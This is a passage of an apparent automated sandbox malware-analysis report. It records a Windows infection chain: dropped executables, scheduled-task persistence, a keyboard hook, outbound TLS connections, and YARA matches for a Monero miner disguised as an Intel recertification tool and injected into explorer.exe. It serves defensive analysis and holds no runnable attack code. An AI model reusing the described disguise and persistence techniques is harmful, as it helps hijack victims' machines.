Source: 4115805b10.exe, 00000028.00000003.2691236731.000001E365820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/sierra
Source: 4115805b10.exe, 00000027.00000003.2671674540.0000026810983000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000003.2670962130.000002681097E000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000003.2671383618.000002681097F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/sierra(B
Source: 4115805b10.exe, 00000027.00000003.2671262555.0000026810961000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000003.2671446840.0000026810961000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/sierra31C80D86845C0
Source: 4115805b10.exe, 00000028.00000003.2691236731.000001E365820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/sierra9D97DA149A509p
Source: 4115805b10.exe, 00000027.00000003.2670730816.0000026810978000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2691236731.000001E365820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: 4115805b10.exe, 00000028.00000003.2691236731.000001E365820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/sierrasandbox3z
Source: 4115805b10.exe, 00000028.00000003.2691236731.000001E365820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/sierrasandbox5D15D
Source: 4115805b10.exe, 00000027.00000003.2671262555.0000026810961000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000003.2671446840.0000026810961000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/sierrasandboxB54A8A
Source: b2885fa695.exe, 00000020.00000003.2631727689.000000000578D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: b2885fa695.exe, 00000020.00000003.2631727689.000000000578D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: b2885fa695.exe, 00000020.00000003.2631727689.000000000578D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: b2885fa695.exe, 00000020.00000003.2631727689.000000000578D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: b2885fa695.exe, 00000020.00000003.2631727689.000000000578D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: Intel_PTT_EK_Recertification.exe, 0000001E.00000003.2521605943.000001FE626E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2530687816.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, Intel_PTT_EK_Recertification.exe, 0000002E.00000003.2876108637.00000202AA9D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.2882244663.00000001402DD000.00000002.00000001.00020000.00000000.sdmp String found in binary or memory: https://xmrig.com/docs/algorithms
Source: Intel_PTT_EK_Recertification.exe, 0000001E.00000003.2521605943.000001FE626E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2530687816.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, Intel_PTT_EK_Recertification.exe, 0000002E.00000003.2876108637.00000202AA9D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.2882244663.00000001402DD000.00000002.00000001.00020000.00000000.sdmp String found in binary or memory: https://xmrig.com/wizard
Source: Intel_PTT_EK_Recertification.exe, 0000001E.00000003.2521605943.000001FE626E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2530687816.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, Intel_PTT_EK_Recertification.exe, 0000002E.00000003.2876108637.00000202AA9D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.2882244663.00000001402DD000.00000002.00000001.00020000.00000000.sdmp String found in binary or memory: https://xmrig.com/wizard%s
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown Network traffic detected: HTTP traffic on port 49925 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49925
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown Network traffic detected: HTTP traffic on port 49888 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49805 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49810 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49816 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49825 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49833 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49842 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.17.46:443 -> 192.168.2.4:49846 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49853 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.17.46:443 -> 192.168.2.4:49852 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.17.65:443 -> 192.168.2.4:49858 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.17.65:443 -> 192.168.2.4:49862 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49867 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49872 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49879 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49880 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49888 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49888 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.91.209:443 -> 192.168.2.4:49925 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Contains functionality to register a low level keyboard hook
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Code function: 6_2_00408DBB SetWindowsHookExW 00000002,Function_00008D8D,00000000,00000000 6_2_00408DBB

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 46.3.Intel_PTT_EK_Recertification.exe.202aa9d0000.0.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 46.3.Intel_PTT_EK_Recertification.exe.202aa9d0000.0.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
Source: 30.3.Intel_PTT_EK_Recertification.exe.1fe626e0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 30.3.Intel_PTT_EK_Recertification.exe.1fe626e0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
Source: 30.3.Intel_PTT_EK_Recertification.exe.1fe626e0000.0.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 30.3.Intel_PTT_EK_Recertification.exe.1fe626e0000.0.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
Source: 47.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 47.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
Source: 31.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 31.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
Source: 46.3.Intel_PTT_EK_Recertification.exe.202aa9d0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 46.3.Intel_PTT_EK_Recertification.exe.202aa9d0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
Source: 0000001E.00000003.2521605943.000001FE626E0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001E.00000003.2521605943.000001FE626E0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects coinmining malware Author: ditekSHen
Source: 0000002E.00000003.2876108637.00000202AA9D0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000002E.00000003.2876108637.00000202AA9D0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects coinmining malware Author: ditekSHen
Source: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f, type: DROPPED Matched rule: Detects images embedding archives. Observed in TheRat RAT. Author: ditekSHen
Source: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png, type: DROPPED Matched rule: Detects images embedding archives. Observed in TheRat RAT. Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\output[1].png, type: DROPPED Matched rule: Detects images embedding archives. Observed in TheRat RAT. Author: ditekSHen
Drops password protected ZIP file
Source: file.bin.6.dr Zip Entry: encrypted
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: random[2].exe.5.dr Static PE information: section name:
Source: random[2].exe.5.dr Static PE information: section name: .idata
Source: random[2].exe.5.dr Static PE information: section name:
Source: b7c03317c9.exe.5.dr Static PE information: section name:
Source: b7c03317c9.exe.5.dr Static PE information: section name: .idata
Source: b7c03317c9.exe.5.dr Static PE information: section name:
Source: random[1].exe2.5.dr Static PE information: section name:
Source: random[1].exe2.5.dr Static PE information: section name: .idata
Source: random[1].exe2.5.dr Static PE information: section name:
Source: b2885fa695.exe.5.dr Static PE information: section name:
Source: b2885fa695.exe.5.dr Static PE information: section name: .idata
Source: b2885fa695.exe.5.dr Static PE information: section name:
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_0016CB97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, 5_2_0016CB97
Contains functionality to communicate with device drivers
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 10_2_00C896AC: free,GetFileInformationByHandle,DeviceIoControl,free,free,memmove,free, 10_2_00C896AC
Creates files inside the system directory
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe File created: C:\Windows\Tasks\Gxtuum.job
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\json[1].json
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\sendMessage[1].json
Deletes files inside the Windows folder
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe File deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B378BB 0_2_00B378BB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B38860 0_2_00B38860
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B37049 0_2_00B37049
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B331A8 0_2_00B331A8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AF4B30 0_2_00AF4B30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AF4DE0 0_2_00AF4DE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B32D10 0_2_00B32D10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B3779B 0_2_00B3779B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B27F36 0_2_00B27F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_00197049 1_2_00197049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_00198860 1_2_00198860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_001978BB 1_2_001978BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_001931A8 1_2_001931A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_00154B30 1_2_00154B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_00192D10 1_2_00192D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_00154DE0 1_2_00154DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_00187F36 1_2_00187F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_0019779B 1_2_0019779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_0015E530 5_2_0015E530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_00176192 5_2_00176192
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_00198860 5_2_00198860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_00154B30 5_2_00154B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_00192D10 5_2_00192D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_00154DE0 5_2_00154DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_00170E13 5_2_00170E13
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_00197049 5_2_00197049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_001931A8 5_2_001931A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_00171602 5_2_00171602
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_0019779B 5_2_0019779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_001978BB 5_2_001978BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_00173DF1 5_2_00173DF1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_00187F36 5_2_00187F36
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Code function: 6_2_00405BFC 6_2_00405BFC
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Code function: 6_2_0040B0E0 6_2_0040B0E0
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Code function: 6_2_0040B0E4 6_2_0040B0E4
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Code function: 6_2_00419973 6_2_00419973
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Code function: 6_2_0040A900 6_2_0040A900
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Code function: 6_2_0040A270 6_2_0040A270
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Code function: 6_2_0040AC20 6_2_0040AC20
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Code function: 6_2_00409C20 6_2_00409C20
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Code function: 6_2_0040D480 6_2_0040D480
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Code function: 6_2_0040ED00 6_2_0040ED00
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Code function: 6_2_00409DD0 6_2_00409DD0
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Code function: 6_2_00419601 6_2_00419601
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Code function: 6_2_004196DB 6_2_004196DB
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Code function: 6_2_00418F40 6_2_00418F40
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 10_2_00CAF13E 10_2_00CAF13E
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 10_2_00CA24C0 10_2_00CA24C0
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 10_2_00CA5458 10_2_00CA5458
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 10_2_00CA47AC 10_2_00CA47AC
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 10_2_00CC8817 10_2_00CC8817
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 10_2_00C90DCC 10_2_00C90DCC
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 10_2_00C8F1B4 10_2_00C8F1B4
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 10_2_00C8B114 10_2_00C8B114
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 10_2_00C9C278 10_2_00C9C278
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 10_2_00CB2578 10_2_00CB2578
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 10_2_00CC3528 10_2_00CC3528
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 10_2_00CB066E 10_2_00CB066E
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 10_2_00CAD66C 10_2_00CAD66C
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 10_2_00C9D858 10_2_00C9D858
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 10_2_00CB79DC 10_2_00CB79DC
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 10_2_00CC49A5 10_2_00CC49A5
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 10_2_00CB99B8 10_2_00CB99B8
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 10_2_00CA694C 10_2_00CA694C
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 10_2_00CBFA0C 10_2_00CBFA0C
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 10_2_00CCDA30 10_2_00CCDA30
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 10_2_00C98CA8 10_2_00C98CA8
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 10_2_00C97C68 10_2_00C97C68
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 10_2_00CCDC11 10_2_00CCDC11
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 10_2_00CCDD00 10_2_00CCDD00
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 10_2_00CA6E08 10_2_00CA6E08
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 10_2_00C9AF58 10_2_00C9AF58
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 10_2_00C88F18 10_2_00C88F18
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Program Files\Windows Media Player\graph\graph.exe D6E7CEB5B05634EFBD06C3E28233E92F1BD362A36473688FBAF952504B76D394
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe BA9212D2D5CD6DF5EB7933FB37C1B72A648974C1730BF5C32439987558F8E8B1
Enables security privileges
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Process token adjusted: Security Jump to behavior
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00B080C0 appears 130 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00167A00 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 0016D64E appears 66 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 0016D942 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 0016D663 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 0016DF80 appears 63 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00188E10 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 001680C0 appears 263 times
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Code function: String function: 004029A6 appears 44 times
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 46.3.Intel_PTT_EK_Recertification.exe.202aa9d0000.0.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 46.3.Intel_PTT_EK_Recertification.exe.202aa9d0000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 30.3.Intel_PTT_EK_Recertification.exe.1fe626e0000.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 30.3.Intel_PTT_EK_Recertification.exe.1fe626e0000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 30.3.Intel_PTT_EK_Recertification.exe.1fe626e0000.0.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 30.3.Intel_PTT_EK_Recertification.exe.1fe626e0000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 47.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 47.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 31.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 31.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 46.3.Intel_PTT_EK_Recertification.exe.202aa9d0000.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 46.3.Intel_PTT_EK_Recertification.exe.202aa9d0000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 0000001E.00000003.2521605943.000001FE626E0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 0000001E.00000003.2521605943.000001FE626E0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 0000002E.00000003.2876108637.00000202AA9D0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 0000002E.00000003.2876108637.00000202AA9D0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f, type: DROPPED Matched rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive author = ditekSHen, description = Detects images embedding archives. Observed in TheRat RAT.
Source: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png, type: DROPPED Matched rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive author = ditekSHen, description = Detects images embedding archives. Observed in TheRat RAT.
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\output[1].png, type: DROPPED Matched rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive author = ditekSHen, description = Detects images embedding archives. Observed in TheRat RAT.
Source: file.exe Static PE information: Section: ZLIB complexity 0.9982012091280654
Source: skotes.exe.0.dr Static PE information: Section: ZLIB complexity 0.9982012091280654
Source: random[2].exe.5.dr Static PE information: Section: pfkrromk ZLIB complexity 0.9940523481638418
Source: b7c03317c9.exe.5.dr Static PE information: Section: pfkrromk ZLIB complexity 0.9940523481638418
